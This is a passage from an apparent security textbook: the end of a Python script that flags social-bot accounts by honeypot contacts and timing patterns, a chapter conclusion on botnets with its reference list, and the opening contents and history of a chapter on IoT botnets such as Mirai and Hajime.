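    (5600, "bot_regular", "friend_request", "u7"),
    (6200, "bot_regular", "friend_request", "u8"),
    (1500, "bot_random", "friend_request", "bob"),
    (3337, "bot_random", "post", None),
    (4120, "bot_random", "friend_request", "decoy_anna"),
    (9001, "bot_random", "friend_request", "erin"),
    (10444, "bot_random", "post", None),
    (15980, "bot_random", "friend_request", "decoy_lee"),
    (17002, "bot_random", "post", None),
    (23750, "bot_random", "friend_request", "frank"),
]

# Illustrative thresholds, not calibrated on a real dataset.
MIN_EVENTS = 5         # need enough events before judging cadence or ratios
CV_SCRIPTED = 0.10     # inter-event gap variation below this looks like a timer
REQUEST_HEAVY = 0.70   # share of outbound requests above this: mass-connecting


@dataclass
class AccountProfile:
    account: str
    n_events: int
    requests_sent: int
    decoy_hits: int                    # distinct honeypot profiles contacted
    interval_cv: Optional[float]       # None when there is no gap to measure
    reasons: frozenset = field(default_factory=frozenset)

    @property
    def flagged(self) -> bool:
        return bool(self.reasons)


def interval_cv(times):
    """Coefficient of variation (stdev/mean) of the gaps between events."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if not gaps:
        return None
    m = mean(gaps)
    return None if m == 0 else pstdev(gaps) / m


def profile_account(account, events, decoys):
    """Score one account from its (time, action, target) tuples."""
    events = sorted(events, key=lambda e: e[0])
    times = [t for t, _, _ in events]
    requests = [tgt for _, act, tgt in events if act == "friend_request"]
    hits = {tgt for tgt in requests if tgt in decoys}
    cv = interval_cv(times)
    reasons = set()
    if hits:                               # decoys never ask first
        reasons.add("honeypot")
    if len(events) >= MIN_EVENTS:
        if cv is not None and cv < CV_SCRIPTED:
            reasons.add("regular_cadence")
        if len(requests) / len(events) >= REQUEST_HEAVY:
            reasons.add("request_heavy")
    return AccountProfile(account, len(events), len(requests), len(hits),
                          cv, frozenset(reasons))


def triage(events, decoys=DECOYS):
    """Group the log by actor and profile every account."""
    by_actor = defaultdict(list)
    for t, actor, action, target in events:
        by_actor[actor].append((t, action, target))
    return {a: profile_account(a, evs, decoys) for a, evs in by_actor.items()}


if __name__ == "__main__":
    for name, p in triage(EVENTS).items():
        cv = "n/a" if p.interval_cv is None else f"{p.interval_cv:.2f}"
        print(f"{name:12s} events={p.n_events:2d} requests={p.requests_sent:2d} "
              f"decoys={p.decoy_hits} cv={cv} -> {sorted(p.reasons) or 'clear'}")
```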
1.8 Conclusion

Botnets are among the top cyber security issues in today’s Internet. Botnets have witnessed major advancements in recent years in terms of their architectures, attack activities, and types. The enormous growth of the Internet and its expansion in recent years has contributed greatly to the development of a new generation of botnets that leverage the vulnerabilities of the new protocols, applications, and devices that compose the Internet. The nature and scale of botnet attacks have increased over time. Traditionally, botnets have been used to conduct various forms of DDoS attacks, email spam campaigns, click fraud, and identity theft. Recently, botnets were used in new malicious activities that include malware distribution, fast flux network services, social campaigns, and digital currency mining. Over the past fifteen years, a significant amount of research has been done in this area focusing on botnet characterization and detection.

This chapter provided a detailed discussion of botnets and their main characteristics. At the beginning, the chapter described the main steps of the botnet lifetime and highlighted the main characteristics, which include the botnet size, geographical distribution, and spatial-temporal correlation. The strength and resilience of any botnet depend on the implementation of its C&C channel. Centralized and P2P botnets were discussed as the two main architectures for the botnet communication topology. This includes traditional PC-based botnets, mobile botnets, IoT botnets, and social botnets. For each type of botnet, the main features were highlighted and the C&C implementation methods were discussed. Overall, this chapter provided a comprehensive review of botnets, their key features, the differences between botnet types, and their C&C implementations. Future research in this field is expected to focus on efficient techniques for botnet detection, while taking into consideration the new types of botnets that have emerged in recent years and the new techniques that are used to implement stealthy and resilient C&C.

References

[1] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. In Proceedings of the 6th ACM SIGCOMM Conference on Internet Measurement, IMC ’06, pages 41–52, New York, NY, USA, 2006. ACM.
[2] T. Holz. A short visit to the bot zoo [malicious bots software]. IEEE Security & Privacy, 3(3):76–79, May 2005.
[3] D. Geer. Malicious bots threaten network security. Computer, 38(1):18–20, Jan 2005.
[4] B. McCarty. Botnets: Big and bigger. IEEE Security & Privacy, 99(4):87–90, Jul 2003.
[5] G. P. Schaffer. Worms and viruses and botnets, oh my! Rational responses to emerging internet threats. IEEE Security & Privacy, 4(3):52–58, May 2006.
[6] Keman Huang, Michael Siegel, and Stuart Madnick. Systematically understanding the cyber attack business: A survey. ACM Computing Surveys, 51(4):1–70:36, Jul 2018.
[7] Europol and NATO Strategic Directions South NSDS. In Internet Organised Crime Threat Assessment (IOCTA 2017). European Union Agency for Law Enforcement Cooperation (Europol), 2017.
[8] Ayesha Binte Ashfaq, Zainab Abaid, Maliha Ismail, Muhammad Umar Aslam, Affan A Syed, and Syed Ali Khayam. Diagnosing bot infections using Bayesian inference. Journal of Computer Virology and Hacking Techniques, 14(1):21–28, 2018.
[9] Shui Yu, Guofei Gu, Ahmed Barnawi, Song Guo, and Ivan Stojmenovic. Malware propagation in large-scale networks. IEEE Transactions on Knowledge and Data Engineering, 27(1):170–179, 2015.
[10] Terry Nelms, Roberto Perdisci, Manos Antonakakis, and Mustaque Ahamad. Towards measuring and mitigating social engineering software download attacks. In USENIX Security Symposium, pages 773–789, 2016.
[11] Francois Mouton, Louise Leenen, and Hein S. Venter. Social engineering attack examples, templates and scenarios. Computers & Security, 59:186–209, 2016.
[12] Amir Javed, Pete Burnap, and Omer Rana. Prediction of drive-by download attacks on Twitter. Information Processing & Management, 2018.
[13] Antonio Nappa, M. Zubair Rafique, and Juan Caballero. The MALICIA dataset: Identification and analysis of drive-by download operations. International Journal of Information Security, 14(1):15–33, 2015.
[14] Guofei Gu, Junjie Zhang, and Wenke Lee. BotSniffer: Detecting botnet command and control channels in network traffic. In Proceedings of the 15th Annual Network and Distributed System Security Symposium (NDSS’08), Feb 2008.
[15] An Wang, Wentao Chang, Songqing Chen, and Aziz Mohaisen. Delving into internet DDoS attacks by botnets: Characterization and analysis. IEEE/ACM Transactions on Networking, 26(6):2843–2855, 2018.
[16] Aditya K Sood, Sherali Zeadally, and Richard J Enbody. An empirical study of HTTP-based financial botnets. IEEE Transactions on Dependable and Secure Computing, 13(2):236–251, 2016.
[17] Son Dinh, Taher Azeb, Francis Fortin, Djedjiga Mouheb, and Mourad Debbabi. Spam campaign detection, analysis, and investigation. Digital Investigation, 12:S12–S21, 2015.
[18] Paul Barford and Vinod Yegneswaran. An inside look at botnets. In Mihai Christodorescu, Somesh Jha, Douglas Maughan, Dawn Song, and Cliff Wang, editors, Malware Detection, pages 171–191, Boston, MA, 2007. Springer US.
[19] Anirudh Ramachandran and Nick Feamster. Understanding the network-level behavior of spammers. SIGCOMM Computer Communication Review, 36(4):291–302, Aug 2006.
[20] Expert: Botnets no. 1 emerging internet threat. www.cnn.com/2006/tech/internet/01/31/furst, Access Date: January 2019.
[21] Evan Cooke, Farnam Jahanian, and Danny McPherson. The zombie roundup: Understanding, detecting, and disrupting botnets. In Proceedings of the Steps to Reducing Unwanted Traffic on the Internet Workshop, SRUTI’05, pages 6–6, Berkeley, CA, USA, 2005. USENIX Association.
[22] M. Patrick Collins, Timothy J. Shimeall, Sidney Faber, Jeff Janies, Rhiannon Weaver, Markus De Shon, and Joseph Kadane. Using uncleanliness to predict future botnet addresses. In Proceedings of the 7th ACM SIGCOMM Conference on Internet Measurement, IMC ’07, pages 93–104, New York, NY, USA, 2007. ACM.
[23] Z. Chen, C. Ji, and P. Barford. Spatial-temporal characteristics of internet malicious sources. In IEEE INFOCOM 2008 - The 27th Conference on Computer Communications, pages 2306–2314, Apr 2008.
[24] D. Dagon, G. Gu, C. P. Lee, and W. Lee. A taxonomy of botnet structures. In Twenty-Third Annual Computer Security Applications Conference (ACSAC 2007), pages 325–339, Dec 2007.
[25] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. My botnet is bigger than yours (maybe, better than yours): Why size estimates remain challenging. In Proceedings of the First Conference on First Workshop on Hot Topics in Understanding Botnets, HotBots’07, pages 5–5, Berkeley, CA, USA, 2007. USENIX Association.
[26] David Dagon, Cliff Zou, and Wenke Lee. Modeling botnet propagation using time zones. In Proceedings of the 13th Network and Distributed System Security Symposium (NDSS), 2006.
[27] C. C. Zou and R. Cunningham. Honeypot-aware advanced botnet construction and maintenance. In International Conference on Dependable Systems and Networks (DSN’06), pages 199–208, Jun 2006.
[28] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. ZMap: Fast internet-wide scanning and its security applications. In Presented as part of the 22nd USENIX Security Symposium (USENIX Security 13), pages 605–620, Washington, DC, 2013. USENIX.
[29] F. Soldo, K. El Defrawy, A. Markopoulou, B. Krishnamurthy, and J. van der Merwe. Filtering sources of unwanted traffic. In 2008 Information Theory and Applications Workshop, pages 199–208, Jan 2008.
[30] Zisis Tsiatsikas, Marios Anagnostopoulos, Georgios Kambourakis, Sozon Lambrou, and Dimitris Geneiatakis. Hidden in plain sight. SDP-based covert channel for botnet communication. In International Conference on Trust and Privacy in Digital Business, pages 48–59, 2015. Springer.
[31] Zisis Tsiatsikas, Georgios Kambourakis, Dimitris Geneiatakis, and Hua Wang. The devil is in the detail: SDP-driven malformed message attacks and mitigation in SIP ecosystems. IEEE Access, 7:2401–2417, 2019.
[32] K. Singh, A. Srivastava, J. Giffin, and W. Lee. Evaluating email’s feasibility for botnet command and control. In 2008 IEEE International Conference on Dependable Systems and Networks With FTCS and DCC (DSN), pages 376–385, Jun 2008.
[33] J. Zhang, R. Perdisci, W. Lee, X. Luo, and U. Sarfraz. Building a scalable system for stealthy P2P-botnet detection. IEEE Transactions on Information Forensics and Security, 9(1):27–38, Jan 2014.
[34] Babak Rahbarinia, Roberto Perdisci, Andrea Lanzi, and Kang Li. PeerRush: Mining for unwanted P2P traffic. Journal of Information Security and Applications, 19(3):194–208, 2014.
[35] Rafael A. Rodríguez-Gómez, Gabriel Maciá-Fernández, Pedro García-Teodoro, Moritz Steiner, and Davide Balzarotti. Resource monitoring for the detection of parasite P2P botnets. Computer Networks, 70:302–311, 2014.
[36] Christian Rossow, Dennis Andriesse, Tillmann Werner, Brett Stone-Gross, Daniel Plohmann, Christian J. Dietrich, and Herbert Bos. P2PWNED: Modeling and evaluating the resilience of peer-to-peer botnets. In Proceedings of the 34th IEEE Symposium on Security and Privacy (S&P), San Francisco, CA, May 2013.
[37] Thorsten Holz, Moritz Steiner, Frederic Dahl, Ernst Biersack, and Felix C Freiling. Measurements and mitigation of peer-to-peer-based botnets: A case study on Storm Worm. LEET, 8(1):1–9, 2008.
[38] Nicolas Falliere. Sality: Story of a peer-to-peer viral network. Rapport technique, Symantec Corporation, 32, 2011.
[39] Joan Calvet, Carlton R Davis, and Pierre-Marc Bureau. Malware authors don’t learn, and that’s good! In 2009 4th International Conference on Malicious and Unwanted Software (MALWARE), pages 88–97, 2009. IEEE.
[40] Max Kerkers, José Jair Santanna, and Anna Sperotto. Characterisation of the Kelihos.B botnet. In IFIP International Conference on Autonomous Infrastructure, Management and Security, pages 79–91, 2014. Springer.
[41] Daniel Plohmann and Elmar Gerhards-Padilla. Case study of the Miner botnet. In 2012 4th International Conference on Cyber Conflict (CYCON), pages 1–16, 2012. IEEE.
[42] Hamad Binsalleeh, Thomas Ormerod, Amine Boukhtouta, Prosenjit Sinha, Amr Youssef, Mourad Debbabi, and Lingyu Wang. On the analysis of the Zeus botnet crimeware toolkit. In 2010 Eighth Annual International Conference on Privacy, Security and Trust (PST), pages 31–38, 2010. IEEE.
[43] The ZeroAccess rootkit. https://nakedsecurity.sophos.com/zeroaccess/, Access Date: January 2019.
[44] Marios Anagnostopoulos, Georgios Kambourakis, and Stefanos Gritzalis. New facets of mobile botnet: Architecture and evaluation. International Journal of Information Security, 15(5):455–473, Oct 2016.
[45] José Martins, Catarina Costa, Tiago Oliveira, Ramiro Gonçalves, and Frederico Branco. How smartphone advertising influences consumers’ purchase intention. Journal of Business Research, 94:378–387, 2019.
[46] Axelle Apvrille. Symbian worm Yxes: Towards mobile botnets? Journal in Computer Virology, 8(4):117–131, Nov 2012.
[47] Phillip Porras, Hassen Saïdi, and Vinod Yegneswaran. An analysis of the iKee.B iPhone botnet. In Andreas U. Schmidt, Giovanni Russello, Antonio Lioy, Neeli R. Prasad, and Shiguo Lian, editors, Security and Privacy in Mobile Information and Communication Systems, pages 141–152, Berlin, Heidelberg, 2010. Springer Berlin Heidelberg.
[48] X. Wei, L. Gomez, I. Neamtiu, and M. Faloutsos. Malicious Android applications in the enterprise: What do they do and how do we fix it? In 2012 IEEE 28th International Conference on Data Engineering Workshops, pages 251–254, Apr 2012.
[49] N. Etaher, G. R. S. Weir, and M. Alazab. From ZeuS to Zitmo: Trends in banking malware. In 2015 IEEE Trustcom/BigDataSE/ISPA, volume 1, pages 1386–1391, Aug 2015.
[50] Y. Zhou and X. Jiang. An analysis of the AnserverBot trojan. Technical report, 2011.
[51] Marios Anagnostopoulos, Georgios Kambourakis, Panagiotis Drakatos, Michail Karavolos, Sarantis Kotsilitis, and David K. Y. Yau. Botnet command and control architectures revisited: Tor hidden services and fluxing. In International Conference on Web Information Systems Engineering, pages 517–527, 2017. Springer.
[52] Yuanyuan Zeng, Kang G. Shin, and Xin Hu. Design of SMS commanded-and-controlled and P2P-structured mobile botnets. In Proceedings of the Fifth ACM Conference on Security and Privacy in Wireless and Mobile Networks, WISEC ’12, pages 137–148, New York, NY, USA, 2012. ACM.
[53] Shuang Zhao, Patrick P. C. Lee, John C. S. Lui, Xiaohong Guan, Xiaobo Ma, and Jing Tao. Cloud-based push-styled mobile botnets: A case study of exploiting the Cloud to Device Messaging service. In Proceedings of the 28th Annual Computer Security Applications Conference, ACSAC ’12, pages 119–128, New York, NY, USA, 2012. ACM.
[54] Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal, and Martin Hron. Torii botnet - not another Mirai variant. https://blog.avast.com/new-torii-botnet-threat-research, Access Date: January 2019.
[55] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas. DDoS in the IoT: Mirai and other botnets. Computer, 50(7):80–84, 2017.
[56] B. Krebs. KrebsOnSecurity hit with record DDoS. https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/, Access Date: January 2019.
[57] Manos Antonakakis, Tim April, Michael Bailey, Matthew Bernhard, Elie Bursztein, Jaime Cochran, Zakir Durumeric, J. Alex Halderman, Luca Invernizzi, Michalis Kallitsis, Deepak Kumar, Chaz Lever, Zane Ma, Joshua Mason, Damian Menscher, Chad Seaman, Nick Sullivan, Kurt Thomas, and Yi Zhou. Understanding the Mirai botnet. In Proceedings of the 26th USENIX Conference on Security Symposium, SEC’17, pages 1093–1110, Berkeley, CA, USA, 2017. USENIX Association.
[58] Gokhan Sagirlar, Barbara Carminati, and Elena Ferrari. AutoBotCatcher: Blockchain-based P2P botnet detection for the Internet of Things. In 2018 IEEE 4th International Conference on Collaboration and Internet Computing (CIC), pages 1–8, 2018.
[59] G. Kambourakis, C. Kolias, and A. Stavrou. The Mirai botnet and the IoT zombie armies. In MILCOM 2017 - 2017 IEEE Military Communications Conference (MILCOM), pages 267–272, Oct 2017.
[60] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi. Inferring, characterizing, and investigating internet-scale malicious IoT device activities: A network telescope perspective. In 2018 48th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), pages 562–573, Jun 2018.
[61] S. M. Sajjad and M. Yousaf. UCAM: Usage, communication and access monitoring based detection system for IoT botnets. In 2018 17th IEEE International Conference On Trust, Security and Privacy In Computing And Communications/12th IEEE International Conference On Big Data Science and Engineering (TrustCom/BigDataSE), pages 1547–1550, Aug 2018.
[62] Yair Meidan, Michael Bohadana, Yael Mathov, Yisroel Mirsky, Asaf Shabtai, Dominik Breitenbacher, and Yuval Elovici. N-BaIoT: Network-based detection of IoT botnet attacks using deep autoencoders. IEEE Pervasive Computing, 17:12–22, 2018.
[63] O. Shwartz, Y. Mathov, M. Bohadana, Y. Oren, and Y. Elovici. Reverse engineering IoT devices: Effective techniques and methods. IEEE Internet of Things Journal, 5(6):4965–4976, 2018.
[64] Yazan Boshmaf, Ildar Muslukhov, Konstantin Beznosov, and Matei Ripeanu. The socialbot network: When bots socialize for fame and money. In Proceedings of the 27th Annual Computer Security Applications Conference, ACSAC ’11, pages 93–102, New York, NY, USA, 2011. ACM.
[65] C. Freitas, F. Benevenuto, S. Ghosh, and A. Veloso. Reverse engineering socialbot infiltration strategies in Twitter. In 2015 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM), pages 25–32, Aug 2015.
[66] Leyla Bilge, Thorsten Strufe, Davide Balzarotti, and Engin Kirda. All your contacts are belong to us: Automated identity theft attacks on social networks. In Proceedings of the 18th International Conference on World Wide Web, WWW ’09, pages 551–560, New York, NY, USA, 2009. ACM.
[67] Marti Motoyama, Kirill Levchenko, Chris Kanich, Damon McCoy, Geoffrey M. Voelker, and Stefan Savage. Re: CAPTCHAs - understanding CAPTCHA-solving services in an economic context. In USENIX Security Symposium, 2010.
[68] Zack Coburn and Greg Marra. Realboy: Believable Twitter bots. http://ca.olin.edu/2008/realboy/index.html, Access Date: January 2019.
[69] A. Paradise, A. Shabtai, R. Puzis, A. Elyashar, Y. Elovici, M. Roshandel, and C. Peylo. Creation and management of social network honeypots for detecting targeted cyber attacks. IEEE Transactions on Computational Social Systems, 4(3):65–79, Sep 2017.
[70] C. Pacheco, A. Garcia, R. Machado, and R. Salles. Building reference datasets to support socialbots detection. In 2018 Workshop on Metrology for Industry 4.0 and IoT, pages 198–202, Apr 2018.
[71] Chiyu Cai, Linjing Li, and Daniel Zeng. Detecting social bots by jointly modeling deep behavior and content information. In Proceedings of the 2017 ACM on Conference on Information and Knowledge Management, CIKM ’17, pages 1995–1998, New York, NY, USA, 2017. ACM.
[72] Zhi Yang, Christo Wilson, Xiao Wang, Tingting Gao, Ben Y. Zhao, and Yafei Dai. Uncovering social network sybils in the wild. ACM Trans. Knowl. Discov. Data, 8(1):2:1–2:29, Feb 2014.
[73] Xianchao Zhang, Haijun Bai, and Wenxin Liang. A social spam detection framework via semi-supervised learning. In Revised Selected Papers of the PAKDD 2016 Workshops on Trends and Applications in Knowledge Discovery and Data Mining - Volume 9794, pages 214–226, Berlin, Heidelberg, 2016. Springer-Verlag.
Chapter 2
IoT Botnets: The Journey So Far and the Road Ahead
Pascal Geenens
Radware, Inc.

Contents
2.1 Introduction  34
2.2 IoT Attack Surface  38
  2.2.1 Universal Plug and Play  40
2.3 Blueprint of an IoT Botnet  44
  2.3.1 Kaiten  46
    2.3.1.1 Setup, Scanning and Infection  47
    2.3.1.2 Client Bot  48
  2.3.2 Qbot  52
    2.3.2.1 Setup  52
    2.3.2.2 Scanning and Infection  54
    2.3.2.3 Client Bot  55
    2.3.2.4 Command and Control  59
    2.3.2.5 Qbot Variants  60
  2.3.3 Mirai  62
    2.3.3.1 Client Bot  63
    2.3.3.2 Scanning and Infection  65
    2.3.3.3 Loader service  70
    2.3.3.4 Command and Control  75
    2.3.3.5 Attack payload  77
    2.3.3.6 DNS Water Torture  78
  2.3.4 Hajime  79
    2.3.4.1 Infection  82
    2.3.4.2 Client Bot  84
    2.3.4.3 Scanner Extension Module  86
  2.3.5 BrickerBot  88
    2.3.5.1 BrickerBot Sentinels  90
  2.3.6 VPNFilter  92
    2.3.6.1 Extension Plug-Ins  93
2.4 DDoS-for-Hire, the Case of Booters and Stressers  95
2.5 Closing Thought  97

2.1 Introduction

The rise in popularity of IoT botnets centers around the Mirai attacks of October 2016. In a period of only a few weeks, KrebsOnSecurity.com¹, OVH², and Dyn³ all became victims of record-breaking distributed denial-of-service (DDoS) attacks. The attacks that temporarily crippled KrebsOnSecurity.com exceeded 600 Gbps in volume [1], one of the largest on record at the time. The impact of the Dyn attacks was felt by large swathes of users in Europe and North America and affected major internet platforms and services including Airbnb, GitHub, Amazon, CNN, Twitter, Slack, PlayStation Network, Xbox Live, and many more. Between the OVH and Dyn attacks, Mirai had its source code published on HackForums, from where it was quickly replicated to more accessible platforms such as GitHub. Tutorial blogs and YouTube videos detailing how to build and deploy Mirai followed shortly. From that point forward, the attacker community had access to a tool of mass destruction that was easy to build and deploy, with an opportunity to improve and extend its capabilities.

¹ Website of investigative reporter Brian Krebs.
² French web hosting provider.
³ Domain Name System (DNS) provider.

Since the Mirai attacks in 2016, IoT botnets have come a long way. The original goal of Mirai was to create an efficient tool for performing DDoS attacks. Later, IoT bots added new exploits, mainly to keep ahead of their competing cousins, while mostly reusing the same scanning, command and control (C2), and malicious payloads in terms of attack vectors. By the end of 2017, IoT malware started taking advantage of the same exploit vectors but carrying new malicious capabilities, such as cryptocurrency mining, anonymizing proxy services, data exfiltration capabilities, rootkits, and self-destructive sequences. The anonymizing proxies were leveraged for concealing targeted attacks and spam or click-fraud campaigns. The sophistication of IoT malware increased considerably as organized hacking groups joined the opportunistic attacker community in their war on free distributed computing resources. The VPNFilter malware, discovered by Cisco Talos in 2018 [2], was attributed to a Russian state-sponsored cyber-crime group [3]. VPNFilter represents an inflection point in terms of sophistication, persistence, and evasive actions observed in IoT malware. Up to that point, IoT malware was unsophisticated, providing limited forms of evasion, little or no concealment of C2 activity, and no or limited protection of C2 infrastructure.

While the most notorious, Mirai was not the first malware to take advantage of IoT devices. As early as December 2013, a researcher [4] observed hundreds of thousands of spam emails originating from a botnet made up of one hundred thousand hacked appliances. While the majority of malicious mail was initiated by home networking devices, such as routers and network attached storage (NAS) systems, a significant percentage of malicious email came from nontraditional sources such as connected multimedia centers, smart televisions, and at least one refrigerator. The words “thingbot” and “thingbot-net” were coined by Proofpoint to refer to these newly discovered IoT-based botnets. In March 2014, DDoS attacks were observed [5] originating from a botnet consisting of over 900 CCTV cameras. All compromised devices used in the attack were running embedded Linux with BusyBox. The malware was an ELF binary compiled for the ARM architecture and a variant of the BASHLITE (aka Gafgyt) malware, known for scanning for network devices running BusyBox and looking for open Telnet/SSH services, which are susceptible to brute-force dictionary attacks. In this specific case, the variant also came with the ability to launch HTTP GET flood denial-of-service (DoS) attacks from the compromised devices.
BASHLITE was not, however, the first Linux malware to spread through Telnet services using username/password combinations. The technique was already used back in 2012 by Lightaidra, a worm supporting a number of different architectures such as MIPS, ARM, and PPC and known to perform DDoS attacks. Between 2015 and 2016, different Linux malware families were discovered, all primarily used for performing DDoS attacks: Elknot/BillGates (2015), XOR.DDoS (2015), LUABOT (2016), Remaiten (2016), NewAidra/IRCTelnet (2016), and Mirai (2016). All were improved variants or re-combined code of previous malware in terms of scanning and exploiting, C2 protocols, and supported architectures. In September 2015, the FBI and the Department of Homeland Security published an alert on the opportunities provided by IoT for cybercrime [6]. Despite the warning, in June 2016 a botnet consisting of 25,000 CCTV cameras assaulted an online jewelry store [7], and just a few months later the infamous Mirai demonstrated the deplorable state of IoT security by enslaving several hundred thousand devices and performing extinction-level DDoS attacks on the DNS provider Dyn.
From that moment forward, increasingly creative and sophisticated IoT botnets were observed. Below is a non-exhaustive list of the IoT botnets that represent milestones in the growth in sophistication of IoT botnets:

■ The Hide N’ Seek (HNS) botnet was one of the first to take a stab at persistence across reboots, a nontrivial feature to implement given the diversity of devices. HNS also implemented a custom peer-to-peer protocol for its C2 communications.
■ Satori, the botnet that kept coming back in different forms and kept creating waves of IoT infections while changing infection vectors, abusing the most obvious IoT exploits while adding new ones such as the Android Debug Bridge exploit. Satori carried mostly crypto-mining payloads and no DDoS attacks and was an experiment by its author for testing and tuning exploit vectors. The author, a confused teenager, was mainly motivated by e-fame among his peers and known to have money issues; the mining earnings were a welcome bonus of his experiments.
■ OMG [8], a botnet that added a tiny-footprint, open-source proxy server to the bots to create an anonymizer network based on other people’s appliances.
■ VPNFilter [2], a botnet primarily targeting routers and modems geolocated in Ukraine, was found carrying malicious payloads to proxy its victims’ internet traffic and scan for Modbus traffic on the local network. Allegedly a nation-state botnet, it had a complex multistage infection scheme, numerous evasions, and provisions to protect against takedown of its C2 infrastructure.

A few days before the Dyn attacks by Mirai, researchers from Rapidity Networks discovered a much more sophisticated and competing IoT botnet. They named it “Hajime” [9], “beginning” in Japanese, a playful iteration on the Mirai name, which means “future” in Japanese. Hajime uses a distributed peer-to-peer protocol implemented on top of BitTorrent, using daily rotating info hashes and RC4 public/private key encryption.
Hajime can update itself and extend its capabilities through extension modules. Hajime is supposedly a white hat project, a botnet built to protect vulnerable IoT devices from further abuse by malicious botnets. It marked a new era in which white hat botnets could bring a solution by inoculating the internet against the viral spreading of malicious botnets through vulnerable IoT devices. In the same spirit, there was BrickerBot [10], a vigilante botnet designed to purge the internet of vulnerable IoT devices. Using sentinels that watch for infected devices that attempt to compromise one of its bots, BrickerBot would retaliate against the attacker with devastating permanent denial-of-service (PDoS) attacks. BrickerBot was the first fully autonomous IoT botnet, not requiring any user interaction to perform attacks and fully decentralized in the sense that each bot functioned entirely independently of the others.

A permanent denial-of-service or PDoS attack damages its victim to such an extent that replacement of hardware or reinitialization of software or firmware is needed to recover the service. The effects of a PDoS attack are lasting, compared to a DDoS attack, which renders a service unavailable temporarily for the duration of the attack (see Figure 2.1).

October 2016 brought the inflection point for IoT botnets as Mirai provided this unsophisticated weapon of destruction, free for anyone to use, abuse, and improve. The botnet sizes observed in the first few months after Mirai were daunting, but as competition for vulnerable IoT resources grew, botnets got more fragmented, reducing the botnet sizes but at the same time increasing the number of botnets and potential threats. Owned devices got re-owned by newer, more sophisticated variants, which reduced the overall life expectancy of IoT botnets. However, this never reduced the risk associated with IoT botnets as such: while a couple of thousand IoT devices are not enough to generate internet-level extinction events, of which we got a taste during the Dyn attacks, it is plenty enough to bring down most online businesses.

The remainder of this chapter aims to give the reader a solid understanding of the mechanics behind IoT botnets: the what and why of their features, their evolution, and, most importantly, their potential to thrive on the lackluster security of connected devices. The approach of this chapter is to illustrate through known, real-world botnets. Where available, fragments of the actual bot source code will be used to provide a deeper understanding and give a peek behind the curtains into the world of botnet authors. The chapter builds up from the earlier,

Figure 2.1 PDoS vs DDoS.